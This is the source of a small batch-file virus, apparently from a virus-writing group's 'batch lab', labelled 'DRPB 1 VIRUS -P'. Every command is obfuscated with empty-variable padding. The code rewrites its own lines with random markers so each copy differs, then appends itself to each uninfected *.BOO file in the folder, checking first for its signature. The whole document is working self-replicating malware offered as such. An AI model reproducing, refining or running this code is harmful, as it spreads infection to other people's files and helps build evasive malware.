                              | <DRPB 1 VIRUS -P> |
                              ---------------------
------------------------------------------------------------------------------------

%Z6%@EC%Z6%HO %Z6%OFF%Z6%&@S%Z6%ET Y=EC%Z6%HO%Z6%
%Z6%@FI%Z6%ND "Z6"<""%0"">Z6_
%Z6%@F%Z6%OR /F "TOKENS=* DELIMS=," %%N IN (Z6_) DO (
%Z6%S%Z6%ET LI=%%N
%Z6%CM%Z6%D /V /C %Y% !LI:Z6=$%RANDOM%!>>Z6
%Z6%)
%Z6%MO%Z6%VE Z6 Z6_
%Z6%F%Z6%O%Z6%R %%Q IN (*.BOO) DO C%Z6%AL%Z6%L :Z6 "%%Q"
%Z6%D%Z6%el Z6_&EXIT%Z6%%Z6%
:Z6
%Z6%F%Z6%I%Z6%N%Z6%D "Zx6"<%1>NUL%Z6%%Z6%
%Z6%%Z6%IF ERRORLEVEL 1 T%Z6%Y%Z6%P%Z6%E Z6_>>%1

------------------------------------------------------------------------------------


====-------=-==-===-----==
| DR RUSTAM/VX BATCH LAB |
====--=-====-----=-=-====-